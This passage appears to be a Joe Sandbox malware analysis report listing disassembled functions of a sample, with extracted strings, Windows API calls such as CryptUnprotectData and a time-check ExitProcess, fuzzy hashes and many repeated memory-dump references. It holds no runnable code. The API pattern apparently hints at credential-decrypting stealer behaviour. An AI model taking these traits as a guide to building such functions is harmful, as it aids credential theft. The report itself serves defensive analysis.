Opcode Fuzzy Hash: 97a1d927787848033f17c7c091dabc90807da96b21a0e6fa3168b178c29a2b84
Instruction Fuzzy Hash: F1B207F360C200AFE708AE29EC8567ABBE5EF94720F1A493DE6C5C3744E63558418797

Function 00738394 Relevance: 7.8, Strings: 5, Instructions: 1569COMMON

Download Yara Rule

Strings

/w7o, xrefs: 00739208
#Toy, xrefs: 0073907B
B*'_, xrefs: 00738EA7
MG*{, xrefs: 00738DE1
du;v, xrefs: 00738DF2

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: #Toy$/w7o$B*'_$MG*{$du;v
API String ID: 0-26489602
Opcode ID: 613e36170d74921b7d427aac09595e1c5bb386f4b11220a5141bf8eead01cb1a
Instruction ID: 1b344854fb6313b5854dbe3182f83a2360e7c1fb7b8f2640aa559b819e7c20ac
Opcode Fuzzy Hash: 613e36170d74921b7d427aac09595e1c5bb386f4b11220a5141bf8eead01cb1a
Instruction Fuzzy Hash: D4B204F360C2049FE3046E29EC8567ABBE9EF94720F1A493DE6C5C7744EA3598048787

Function 00376920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0037696C
sscanf.NTDLL ref: 00376999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003769B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003769C0
ExitProcess.KERNEL32 ref: 003769DA

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: ec3b9ef7556ded8d626276afc81e9a7c8595c0670c59c2709e6b9a4499bf04ea
Instruction ID: 1bb07d6dcf09189afc1aca121d496d63e859682500d2c44da933bf17a329c84b
Opcode Fuzzy Hash: ec3b9ef7556ded8d626276afc81e9a7c8595c0670c59c2709e6b9a4499bf04ea
Instruction Fuzzy Hash: 6521EB75D10209ABCF44EFE4D9459EEB7B5FF48300F04852AE51AE3250EB385609DB65

Function 00367240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0036724D
RtlAllocateHeap.NTDLL(00000000), ref: 00367254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00367281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003672A4
LocalFree.KERNEL32(?), ref: 003672AE

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 2fd27e4f0848d1be480f4069b03cb7716146501c51056f64fb786fe685fe9a7f
Instruction ID: 0ce0ae38154a6f6bcc8b71f01efc1b0636d62663d30a8334aeb99fa74768a4ce
Opcode Fuzzy Hash: 2fd27e4f0848d1be480f4069b03cb7716146501c51056f64fb786fe685fe9a7f
Instruction Fuzzy Hash: 00011EB5A40208BBEB14DFD4CD4AF9E77B8EB44B04F108554FB05AB2C0D7B4AA04DBA5

Function 00378EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00365184,40000001,00000000,00000000,?,00365184), ref: 00378EC0

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: f9da16329615f5424646e22a8070795dc459e2fdd5cfdd05af1e45d5a85bedbc
Instruction ID: 267292f0d2fe83b0a2aafb0a561ea3e0b79eb8fb2ea2933a89f5c2fb553c248a
Opcode Fuzzy Hash: f9da16329615f5424646e22a8070795dc459e2fdd5cfdd05af1e45d5a85bedbc
Instruction Fuzzy Hash: BB110370240209AFDB11CF64E888FAA33A9AF8A710F10D448F9198B650DB39E841EB60

Function 00729172 Relevance: 5.4, Strings: 3, Instructions: 1699COMMON

Download Yara Rule

Strings

3|, xrefs: 0072A21D
W}y^, xrefs: 007292C1
:KK, xrefs: 0072991D

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: :KK$W}y^$3|
API String ID: 0-2848387405
Opcode ID: 12633ce148d58d2c482bfd422d34e49217a38680b69d942c290c99fbd5007ecb
Instruction ID: 6a989b6bb3fddd31fbfbc8de91f04fc492b9d3e219ce1866dfa41308ca086cbe
Opcode Fuzzy Hash: 12633ce148d58d2c482bfd422d34e49217a38680b69d942c290c99fbd5007ecb
Instruction Fuzzy Hash: 94B219F3A0C2149FE3046E2DEC8567AF7E9EFD4620F1A463DEAC4C3744E97598058692

Function 00373720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0037E118,00000000,00000001,0037E108,00000000), ref: 00373758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003737B0

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 127b141f6f0294fe60643c204a4413dd308dfed029a972d742321ab5d2c7ac8f
Instruction ID: b3a3aa5fa63f04b35ad09e084ad7ec9997e708850a3172a86cfeb25cec69df36
Opcode Fuzzy Hash: 127b141f6f0294fe60643c204a4413dd308dfed029a972d742321ab5d2c7ac8f
Instruction Fuzzy Hash: F741F870A40A28AFDB24DB58CC95B9BB7B4FB48702F4081D8E609EB2D0D7716E85CF51

Function 0081065A Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

1<z, xrefs: 008107DE
RUS, xrefs: 00810712

Memory Dump Source

Source File: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 1<z$RUS
API String ID: 0-3798198490
Opcode ID: 49374151852e2d9c0f4856df072acf288e8aa8af3963cacc9bae41fce5e25eef
Instruction ID: 69a15e745ed5a9107ef2b66ab7cf4b18e777fb18102e9b0cea7f55205b3ad8c2
Opcode Fuzzy Hash: 49374151852e2d9c0f4856df072acf288e8aa8af3963cacc9bae41fce5e25eef
Instruction Fuzzy Hash: 605166B390C30CDBD3046E18DC405BAB7E9FF94718F36892EE582C2640E5B658D1AE83

Function 0068ADBD Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

e7, xrefs: 0068AE8F
;S_, xrefs: 0068AE11

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ;S_$e7
API String ID: 0-3236386338
Opcode ID: e53697e4be8d02440ee99efad0e4d949ca9e2e5724d941b977b8aced24a482a1
Instruction ID: 2f3f94752bf78bb6dc9dc98b4e81b3dc21e72f9bea5310c8bd6e5f0075979998
Opcode Fuzzy Hash: e53697e4be8d02440ee99efad0e4d949ca9e2e5724d941b977b8aced24a482a1
Instruction Fuzzy Hash: 2C5148F3E081145BF318AA2AEC55777F69AEBD0730F1A863EE985C73C4DD3548058292

Function 005F29A9 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

l]}, xrefs: 005F2C2E

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
